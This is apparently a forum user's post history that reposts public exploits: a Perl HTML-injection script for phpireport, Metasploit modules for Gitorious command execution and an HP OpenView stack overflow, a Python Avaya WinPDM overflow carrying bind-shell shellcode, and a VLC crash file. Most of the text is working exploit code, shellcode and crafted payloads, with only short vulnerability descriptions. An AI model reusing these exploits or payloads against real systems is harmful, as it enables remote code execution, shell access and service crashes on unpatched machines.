Jump to content

The_Arhitect

Active Members
 View Profile  See their activity

  • Posts

    425

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by The_Arhitect

  1. The_Arhitect
    php ireport v1.0 Remote Html Code injection #!/usr/bin/perl ######################################################################## # Title = phpireport v1.0 => Remote Html Code injection # Author = Or4nG.M4n # Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar # Thnks : # +----------------------------------+ # | xSs m4n i-Hmx h311 c0d3 | # | Dr.Bnned ahwak2000 sa^Dev!L | # +----------------------------------+ # # Html injection # vuln : messages_viewer.php # vuln : home.php # vuln : history.php # code : # # echo " # <li> # <div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div> # <br> # <div class='post-details'>".stripslashes($message)."</div> # </li> # "; # How i can Fixed .. # in all vuln file # Replace : stripslashes => Replace with => htmlspecialchars # Thnks to All Stupid Coders # use LWP::UserAgent; print "Code to inject #"; my $inj = <STDIN>; chomp $inj; my $url = 'http://localhost/phpireport/index.php'; my $ua = LWP::UserAgent->new(); my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'></textarea> my $content = $response->decoded_content(); print "\n done \n"; # The End Sursa: php ireport v1.0 Remote Html Code injection
  2. The_Arhitect
    Gitorious Arbitrary Command Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Gitorious Arbitrary Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the in gitorious. Unvalidated input is send to the shell allowing command execution. }, 'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ], ], 'Privileged' => false, 'Payload' => { 'BadChars' => "\x60", 'DisableNops' => true, 'Space' => 31337, 'Compat' => { 'PayloadType' => 'cmd', } }, 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jan 19 2012' )) register_options( [ OptString.new('URI', [true, "Path to project and repository", "/project/repo"]), ], self.class) end def exploit # Make sure the URI begins with a slash uri = datastore['URI'] if uri[0,1] != '/' uri = '/' + uri end # Make sure the URI ends without a slash, because it's already part of the URI if uri[-1, 1] == '/' uri = uri[0, uri.length-1] end command = Rex::Text.uri_encode(payload.raw, 'hex-all') command.gsub!("%20","%2520") res = send_request_cgi({ 'uri' => "/api"+ uri + "/log/graph/%60#{command}%60", 'method' => 'GET', 'headers' => { 'Connection' => 'Close', } }) #default timeout, we don't care about the response if (res) print_status("The server returned: #{res.code} #{res.message}") end handler end end Sursa: Gitorious Arbitrary Command Execution
  3. The_Arhitect
    HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Egghunter def initialize(info={}) super(update_info(info, 'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function "_OVConcatPath" which finally uses "strcat" in a insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. If the installation path cannot be guessed the default installation path is used. } , 'Author' => [ 'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery 'juan vazquez', # Metasploit module 'sinn3r' # Metasploit fu ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2011-3167' ], [ 'OSVDB', '76775' ], [ 'BID', '50471' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ], [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ] ], 'Payload' => { 'Space' => 950, 'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"), 'DisableNops' => true, 'EncoderOptions' => { 'BufferRegister' => 'EDI' # Egghunter jmp edi } }, 'Platform' => 'win', 'Targets' => [ [ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3', # Patches installed: # * ECS_00048 # * NNM_01128 # * NNM_01172 # * NNM_01187 { 'Offset' => 1067, 'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002) 'JmpESP' => 0x5a4251c5, # call esp - in ov.dll 'EggAdjust' => 4, 'ReadableAddress' => 0x5a466930 # ov.dll } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 01 2011')) register_options( [ Opt::RPORT(80), ], self.class) end # The following code allows to migrate if having into account # that over Windows XP permissions aren't granted on %windir%\system32 # # Code ripped from "modules/post/windows/manage/migrate.rb". See it # for more information def on_new_session(client) if client.type != "meterpreter" print_error("NOTE: you must use a meterpreter payload in order to process migration.") return end client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") # Select path and executable to run depending the architecture # and the operating system if client.sys.config.sysinfo["OS"] =~ /Windows XP/ windir = client.fs.file.expand_path("%ProgramFiles%") cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe" else # Windows 2000 windir = client.fs.file.expand_path("%windir%") if client.sys.config.sysinfo['Architecture'] =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" else cmd = "#{windir}\\Sysnative\\notepad.exe" end end # run hidden print_status("Spawning #{cmd.split("\\").last} process to migrate to") proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) target_pid = proc.pid begin print_good("Migrating to #{target_pid}") client.core.migrate(target_pid) print_good("Successfully migrated to process #{target_pid}") rescue ::Exception => e print_error("Could not migrate in to process.") print_error(e.to_s) end end # Tries to guess the HP OpenView install dir via the Directory traversal identified # by OSVDB 44359. # If OSVDB 44359 doesn't allow to retrieve the installation path the default one # (C:\Program Files\HP OpenView\) is used. # Directory Traversal used: # http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log def get_install_path cgi = '/OvCgi/OpenView5.exe' web_session = rand_text_numeric(3) my_cookie = "OvOSLocale=English_United States.1252; " my_cookie << "OvAcceptLang=en-US; " my_cookie << "OvJavaLocale=en_US.Cp1252; " my_cookie << "OvWebSession=#{web_session}:AnyUser:" payload = "../../../log/setup.log" res = send_request_cgi({ 'uri' => cgi, 'cookie' => my_cookie, 'method' => "GET", 'vars_get' => { 'Target' => "Main", 'Scope' => "Snmp", 'Action' => payload } }, 5) installation_path = "" if res and res.code == 200 and res.body =~ /([A-Z]:\\.*\\)log/ print_status("Installation Path Found in #{$1}") installation_path = $1 else print_status("Installation Path Not Found using the default") installation_path = "C:\\Program Files\\HP OpenView\\" end return installation_path end def exploit print_status("Trying target #{target.name}...") install_path = get_install_path install_path << "help\\English_United States.1252" eggoptions = { :checksum => true, } hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) [ 'x86/alpha_mixed'].each { |name| enc = framework.encoders.create(name) if name =~/alpha/ # If control is transferred to the decoder via "call esp" BufferOfset # shoulds be adjusted. if target["EggAdjust"] and target["EggAdjust"] > 0 enc_options = { 'BufferRegister' => 'ESP', 'BufferOffset' => target["EggAdjust"] } enc.datastore.import_options_from_hash(enc_options) else enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) end end hunter = enc.encode(hunter, nil, nil, platform) } offset = target['Offset'] - install_path.length - egg.length my_payload = egg my_payload << rand_text_alphanumeric(offset) my_payload << [target.ret].pack("V") my_payload << rand_text_alphanumeric(4) # Padding my_payload << [target["ReadableAddress"]].pack("V") my_payload << [target["JmpESP"]].pack("V") my_payload << hunter buf = "-textFile+#{my_payload}+++++++++++++++++++++++" buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++" buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++" buf << "-dataLine+2+" buf << "-commandTitle+%22Services%22+%09%09++++++" buf << "-iconName+%22Services%22+++++++++++++++++++++++" buf << "-cmd+rnetstat+" buf << "-S" web_session = rand_text_numeric(3) my_cookie = "OvOSLocale=English_United States.1252; " my_cookie << "OvAcceptLang=en-US; " my_cookie << "OvJavaLocale=en_US.Cp1252; " my_cookie << "OvWebSession=#{web_session}:AnyUser:" cgi = '/OvCgi/webappmon.exe' res = send_request_cgi({ 'uri' => cgi, 'cookie' => my_cookie, 'method' => "POST", 'vars_post' => { 'ins' => 'nowait', 'sel' => rand_text_alphanumeric(15), 'app' => 'IP Tables', 'act' => 'Services', 'help' => '', 'cache' => rand_text_numeric(4) }, 'data' => "arg=#{buf}" # Avoid uri encoding }, 3) if res and res.code != 502 print_error("Eek! We weren't expecting a response, but we got one") if datastore['DEBUG'] print_line() print_error(res.inspect) end end handler end end =begin * migrate to %windir%/system32/notepad.exe fails on Windows XP SP3 meterpreter > run post/windows/manage/migrate [*] Running module against HOME-F006222D6C [*] Current server process: webappmon.exe (7064) [*] Spawning notepad.exe process to migrate to [-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. [-] Call stack: [-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute' [-] (eval):80:in `create_temp_proc' [-] (eval):49:in `run' =end Sursa: HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
  4. The_Arhitect
    Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute # Abysssec Public Exploit # more info www.abysssec.com # Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute #A boundary error in the Unite Host Router service (UniteHostRouter.exe) #when processing certain requests can be exploited to cause a stack-based buffer #overflow via an overly long string in the "To:" field sent to UDP port 3217. ''' signed int __cdecl sub_403160(const char *Str, void *a2) { char *v2; char *v3; const void *v4; char *v5; unsigned int v6; signed int result; v2 = strpbrk(Str, "\n\r"); v3 = strpbrk(Str, "/\n\r"); if ( v3 >= v2 || (v4 = v3 + 1, v5 = strpbrk(v3 + 1, ":/? \n\r"), v5 > v2) ) { result = 0; } else { v6 = v5 - v4; memcpy(a2, v4, v6); // vulnerable memcpy *((_BYTE *)a2 + v6) = 0; result = 1; } return result; } signed int __cdecl sub_403160_patched(const char *Str, void *a2) { char *v2; char *v3; const void *v4; char *v5; unsigned int v6; signed int result; v2 = strpbrk(Str, "\n\r"); if ( v2 && (v3 = strpbrk(Str, "/\n\r")) != 0 && v3 < v2 && (v4 = v3 + 1, (v5 = strpbrk(v3 + 1, ":/? \n\r")) != 0) && v5 <= v2 && (v6 = v5 - v4, (signed int)v6 <= 256) ) // patched by checking <= 256 { memcpy(a2, v4, v6); *((_BYTE *)a2 + v6) = 0; result = 1; } else { result = 0; } return result; } ''' from socket import socket, AF_INET, SOCK_DGRAM data = '\x55\x54\x50\x2f\x31' # Protocol data +=' To: 127.0.0.1' data+= ' /'+"A"*260 data+= "\xFB\xF8\xAB\x71" # 71ABF8FB call esp W32_SOCK.dll # win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum # http://metasploit.com data += ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") data += '\r\n\r\n' #\n\n port = 3217 hostname = '192.168.171.129' udp = socket(AF_INET,SOCK_DGRAM) udp.sendto(data, (hostname, port)) print "Send malicius packet\n" print "You Should Got a shell at %s 4444" % hostname Sursa: Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute
  5. The_Arhitect
    VLC 1.2.0 (libtaglib_pluggin.dll) DoS import binascii print '\n\n' print '#########################################################' print '# VLC (libtaglib_plugin.dll) divide by zero DOS #' print '# Tested on : Windows 7 and XP sp3 #' print '# VLC verion : 1.2.0 and 1.1.11 (possibly lower) #' print '# Author : nomnom #' print '# Date : 1/19/2012 #' print '# - shouts to disable, jtm, welder and the csg #' print '# http://utdcsg.org #' print '#########################################################' print '\n\n' #Offset = 6, value = ['\xff', '\xff', '\xff', '\xff'] #libtaglib_plugin.dll:6cd65a07 div eax, [ecx+0x8] from thread 3160 - divide by zero # #CONTEXT DUMP # EIP: 6cd65a07 div eax, [ecx+0x8] # EAX: 00000000 ( 0) -> N/A # EBX: 00000000 ( 0) -> N/A # ECX: 02ef6ac8 ( 49244872) -> x@$hJz@ih8Hs(foRh (heap) # EDX: 00000000 ( 0) -> N/A # EDI: 00000001 ( 1) -> N/A # ESI: 00000000 ( 0) -> N/A # EBP: 013bf4f0 ( 20706544) -> p; (stack) # ESP: 013bf438 ( 20706360) -> ;JG l;(;;; lLJl;qZl8;GwilhililPil0ilil(\ilil Wilp;`l jp;;x; ltJlh; (stack) # +00: 013bf4a0 ( 20706464) -> ilhililPil0ilil(\ilil Wilp;`l jp;;x; ltJlh;`l;wFlw lil@il(il0;bl\;; l (stack) # +04: 00000000 ( 0) -> N/A # +08: 00000008 ( 8) -> N/A # +0c: 00000004 ( 4) -> N/A # +10: 02ef4a1a ( 49236506) -> ((WH. a(BTBP~jm''(B(B(B(B(B0 (heap) # +14: 00000000 ( 0) -> N/A # #disasm around: # 0x6cd659e3 test edx,edx # 0x6cd659e5 jz 0x6cd659fd # 0x6cd659e7 mov ebx,[ebp-0x90] # 0x6cd659ed sub ebx,0x1 # 0x6cd659f0 imul ebx,[ebp-0x9c] # 0x6cd659f7 add ebx,[ebp-0x98] # 0x6cd659fd mov eax,[ebp+0x8] # 0x6cd65a00 xor edx,edx # 0x6cd65a02 mov ecx,[eax+0x8] # 0x6cd65a05 mov eax,ebx # 0x6cd65a07 div eax, [ecx+0x8] # 0x6cd65a0a mov ebx,eax # 0x6cd65a0c mov [ecx],eax # 0x6cd65a0e xor eax,eax # 0x6cd65a10 test ebx,ebx # 0x6cd65a12 jng 0x6cd65a2f # 0x6cd65a14 mov esi,[ecx+0x1c] # 0x6cd65a17 mov edx,0x10624dd3 # 0x6cd65a1c mov eax,esi # 0x6cd65a1e imul edx # 0x6cd65a20 sar esi,0x1f # #stack unwind: # libtaglib_plugin.dll:6cd660a0 # libtaglib_plugin.dll:6cd66285 # libtaglib_plugin.dll:6cd30b3b # libtaglib_plugin.dll:6cd31951 # libtaglib_plugin.dll:6cd2811b # libtaglib_plugin.dll:6cd2855b # libtaglib_plugin.dll:6cd04d53 # #SEH unwind: # 013bffdc -> msvcrt.dll:77c35c94 push ebp # ffffffff -> kernel32.dll:7c839ad8 push ebp # file contents hexlified = ( "4d414320960fffffffff000018000000040000002c000000781b00000000000000000000f0d36ae" "208700e0b883873777a5272f5d007000000200100dd120000010000001000010044ac00007c00000" "052494646de25000057415645666d7420100000000100010044ac000088580100020010006461746" "1ba2500001e765c5b322600007205562aa8a1fa29223903ee58ed36bec6f1a127d79379040bdc83b" "4965c953895f22f24538c85f2fcc2732c409ccf8f6deb7f38d9f3daddd783d40c7d85439a4529897" "60261a88906d1a7688b7f063cb5152b98f8b19a8a55f61937d51f6be87107ac069b3bda37a7a87e1" "95329ea6245c0facb7c70ec682cd96893ea78b7b4948c1c934d70d9261d44ff8bb989c1a8f6ce429" "b0ffc9ac595a42cf93417485f6f4979c7049f6d02c8add5a31dc71b4419752db02adcb337cdf76c7" "69b42aef9f600d93fec5502a2fc911d35f97d62448d5b2a20e6634585ed92e8692f1d2d00906e606" "70b478696d0e7a43055da2edfaaf61d94d7b4f195c7a6917576d8d115314aa19c02facd2f598cb85" "0a33be38b6904c79e997d83e6115d742d75cbe4101470bab89c20eb3f1b6e066bba5da88df31e14b" "9d1941005570437e23464c01ef8102084fad079fdf95de56575957c06025b1668fa57180b6fb495d" "9ba52a214a3812675fd9db5f4e7c327d9cebd376ee84576d0c3709f37c45bc781b3415dc8ac6538f" "14a1fde8ded60eef16efdc4590c985491052b8adc7801434609e28166959e1a3ccd97a7ac7d20765" "2d0f5ac3a75c7d29e2727233405f8aee68a4d9734bc191b2bf0a5161346f5cdd93fdac824d88ff03" "c64ad0aa5cc54b9b19799b5d81d533d43ae2400a7def650057ea33e1de54e2e9dd461f947ac40884" "4ca0b0345eaa3a3a986b6d8f41ded7632630439fcfeb52f54d71871db88f358c24229c60eb66b780" "299ee2c7a608108acfcaa1a34fac57ed906a15a28c97ecd701e8cc97b609eb29c6f96b8f15a8ed31" "7e920e22df5b44521509cafc5c8f806386f27a06ab6c1a0ccb6dfe167f0750ebbbfc244225376f07" "20e664ee35a3a2bace5178e5a21b1c873014c0076942e6288428a8bbf31c6665142db29bd7978898" "9646005a1800f70aff4920af03b141ff17c73b92a03579e12f465ce6e49b082550a9b51b21f9b4bf" "0985909bc2a2694e55bb9edea1d501c5c50417ffafe4766afbb3b6d3adc82c38f40d52991ec38402" "2f08e324d8ccda865c4ea06725e3390cf23380606faa5f778cb236b459cbb73f5aa4d10142fb4756" "492a19ae38ca220b1ac27b358b18147675a4b2b6350c6b1a76531c06e71de751cd3f71a2196e9765" "1aa85e034e11a85ad34ef258ac61ae5096a81bc05f615ef185e7ef3925305d6f8e38c03aad23fb0d" "a30ffe354551e19407c9ad2cf786273f860e8476f3cbd93bed4f620ce8341c12e4001961620f060f" "2deb9cd3240271d19552063ce14fa8bb46cb535313d3327b2c05d817b559fd4f827938f97a2a775b" "ff027436bfda12ef35f5b9cdd7edfd10ce29765608b71545f6b4dbf0f356f854b6655f33a85f3f0c" "8a9ef8c7954c8ddb084a835d67059f3262e36455be0adc3b21bec5bcd46fea04803c09d8299b349e" "07df517f9ab2543b0d8d72b4250196e1bcc9bcb2e244f724e9784826da664e7dc47fa5cfb674f862" "ec9b4b22f64c4c75bb629cd47a2995b7839ffd8d0ceedaaba8d35d3727aeac7700c95dff06b68f55" "88a736a896f4c262d83085180645595ba425857ada588a8c6ccf4cb008137ec80f1fb73eff634a4c" "8393ef34361d4ddb65f838c0d6f474fd1bb5c97a50a1f790bbad689285ae7d66e64b47bf5ea08a1f" "bed95a59f7df44af59530161a9e1d31acb7f98e449c6a816b4ecc42e0fe96853c1e13cf979eb2f87" "91fa5e5bbecaa7491e0fcdea9a84263853390ab890dc6b12dca3f5b77965385e4ebdffe875b73939" "0c4fc982143288010bcd8b9ff45ca8a64e5a48340feb2ffb825a2dc0775a5752519e50f49addfbdd" "253821a993b7820ea59d37692c1a6e9aeee360e6d72ed3b7428cd62369e48aa44e9920be49645f56" "c50ba7074289e5cd7f19d3fe63060ca1e172ea2529f5d3ea8926ef52b4cbab8d36d26bd9c1b70b19" "ec120d2821fb017060d3dde073540dd86c2cf292966c3b2fe9b7e88d76c98a0ff4e2c64fc3ee9f1b" "dd95fc81938728344e2b824ec51232bf53aa872776f0187914f5231e79cf70d0f3e5c42b40e03d3f" "28c06c3ec097f501ec25cdcbb2d5a82d7586b5782a661b420bbdc49410145e8b14a214513e94c34a" "7322dc5e2a1558b125d09eba9d4793116945b7cde06ddb45841943b7bdb057f3c4f3f47e3f256285" "cbbc2a4e71e860ac1c6cf4620ee12d81a91beadad5ede2275ec9ae0d70b67603f8fc6680823ff15d" "97aba80c4bb4f6a805c572e66d8db354575daac7f8d154faffc498ff8b8f5a8dd4121a7ab34c1ea1" "5330181378c2d50ee4cd42829a834911e8b56ad445c5471a0c66ea2eb3b975d1ae61401f61fc2646" "6c890507c3560329737fd2fea661df560c7a2fbd44ea6802fb11d76d3e0793a72780bce2dc2f4f79" "c8b54e54ce0a954e7fa31a05ca04d77722e21217cab7da2aabe8939d6eafc95b2ffc9458ffd4c77c" "7ad81aa06e203a70a718e56987d7b91609d300a3290f1122bcd47ada24f9a3ae42078c8ffa661842" "c258c9ffdff2f2bba0ae68bc5b18506c44311818eac1680f29fd2035bf59e489ecc9f79e15d34798" "f5f0dbca2f44b3faee54cc8567bf9011aefeaca9076d01773106fcdacd5a68514af03d8f4b53cc96" "872188326d91b6fcd05c88d38ceb59d98d660fc0b2e54f23231514b9e7d88f137be6e09058b5411d" "c72b093f9dcdd3fdd392f5ba3c548eac7fdcaccaae8e72dd729f5fd6f4b1133288174b36d44b3f42" "259f6b7e1981ff3f9768e9c45a81653e9ef15bf325c4b232af9697ed6ae1889301103cc556c23380" "cb71b3e558aaa746bb81311f674c0336f3399d207a53f80f3eb4f24cc828edf2e9245140ba182559" "4abb071c90e2047139869e8e0bd06d4ce7a00189107e0eb5d6f6e0fb48bfb1ffe82e572c736ff54c" "6fc75c729e3c7fd5f3966c5ccc71b07f71cf3273ed71b24ded3a4957f68a70bbba986ec066e7bb66" "96f6dcfafe309deef9e452e08dc3d46abbacc81da56fb912f91b583e22c1005025fb95cf18dfcc0e" "3e4a3eacfb4581b7d2ddf64441a94060fabbe5de608e9ff81d828e32dd6502c52f6bc503ea76ee58" "00a00a9bb0d03ce9f3e98c04c7c5038d7acfd820a83ea86bf0bba5e8a015372c9fadb07106ce1534" "6a00d4d7c6cd52bb4322545ec9a5dcf2a964a19af15842109a2c4fbff89c6aa1f98044f7f70973b3" "77af18ecf1d56988081a604cb72b94fad774a23ab38d5ab8e942c28a4c6566b7669e23b1333dd81e" "022b50d737c9699e144d479029dda239bbea6647960b61eaa4b50cd1350a4c022d60f405f54145f6" "c7181e6b58285dfcc4f3b1491cbbfc497ef0bbbb0175ab1e51a0ef17ceecc4522e5929306821d518" "97821a056bf55e6f9615f62d7d2d2ce3fad671c98d1ccab96b4d8596b477bb931c78dfe52917ed27" "0b6a7c6724312a701c76b2b5a1b9318257229a44eac8366dd4fad97e03041253eb8f3f7eda5a2773" "731fa2fcab24f33a740e9defc7e80d4d861bda8bd691a942926889eb145d5f3fadede5738d9bb86a" "31395d39a56ff8e0d242b0a44dc6ca3a7700957bcae305d41ada4c941c7b20a7e60adeed3ebf10d0" "b1074a404d226b4d7977bf7c2bffc0061bf7f67f35569276fb64121a637ddd88f32cebd30f1ee96a" "63aa3d896824d5e2d29a79bcdad68f3ba9d0043a49ad110d7a225583ad58e49eba0ce43cee1bf626" "60e3e87c205445f02211494aa0fc627f3fb66e9d2b5dbee93cc117aa127e4edd3b94c583ec5ee22f" "ae810fe964c2e44ce782ddb361ae5aa521cb7e223400804e03094cde7531e60910b6d0332cba2c29" "28255e89f3b17070d6450b5e07793b3280d0be7879d3476f30471ce90a1ad4b6452c7fc9a743ad6b" "c61c1938005041b35bc9298d9d074a91675ac3dbbade6de9400405886f931232ffe9b04b623f9a5e" "01843c5088f94e1a222b91350e822eb6b01bcae39ef7e686d2de6832b8c878691b03a75f8f21a47d" "c3f23e3a01543ced0e8af9d9bb867dd2b85d92eac0b618f8cfcc05001c671c671add7ea1f1d0c2b3" "d3e7f788e37d255b35a8a07f552eb2350c5e8427336c8864753c595c3edbf41d7020cee35ffca17b" "3b0fc9cc3c7d499f2532eb2bce60e11128a1d65101f9179c7b24702485132e5c605ce144bcbd0183" "da9a9aa3905d9ccadeb0e707a27fb24a119e49c464068de566d1300ad98f38e99e53745c19044d2b" "25f971f3fdfc13607ad9e760ba21a2ed65eaad40aa3644f9b5947dbcd2f24a44977c952ba0f18970" "bd4ffee95d04b2acd602657db2a864f2c417dd6354fb07e74c3f9df09aeedb883e84b596fab1f498" "e8e16b892a6abf35b72c22993fb666f1205a0747d6cbf48a524f14ddf6512173559162b1bf53b8ef" "0c1f781269306d8b8ab1fd22d6057d2a73486150e2b722dbc73331c1ca029cbcb6249c4dcb2a6324" "6a08934aa50904612a70f363d99e580f0fd4944109bf4d6d7e0b63d02834c2317419fc2ac68081d9" "6c1e94360586b93318ebc16bcb28f5bd205ea100d66c3d650caaa7de28d03ae13aadc75bd42fa2a2" "a706a1606e2ec6a583c16a8bc59faecca4a4970572c2bed8acdd40215b026087ee8dcf4ef6adc335" "a9bda7ed89ac932b2941e95df47c5378c51252d08d05e861de396faec6eb17d0891048473ed0857e" 